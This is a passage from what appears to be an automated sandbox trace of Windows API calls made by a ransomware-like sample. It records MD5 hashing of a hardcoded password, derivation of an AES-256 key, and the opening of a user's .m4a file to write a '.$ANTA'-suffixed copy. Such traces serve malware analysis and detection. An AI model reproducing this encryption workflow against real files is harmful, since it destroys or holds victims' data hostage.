1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0114.225] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0114.225] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.228] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.228] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0114.229] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0114.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.229] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0114.229] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0114.287] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0114.287] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0114.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0114.287] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0114.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0114.288] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0114.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0114.288] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0114.288] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\0csxpxrus0a.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0114.288] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.288] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0114.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0114.291] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9")) returned 0x10 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0114.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\0csxpxrus0a.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0114.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0114.292] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0114.292] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0114.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0114.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0114.296] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0114.296] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x66d, lpOverlapped=0x0) returned 1 [0114.297] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0114.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0114.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0114.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x66d) returned 0x43faa98 [0114.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x66d) returned 0x43fb110 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0114.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.300] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 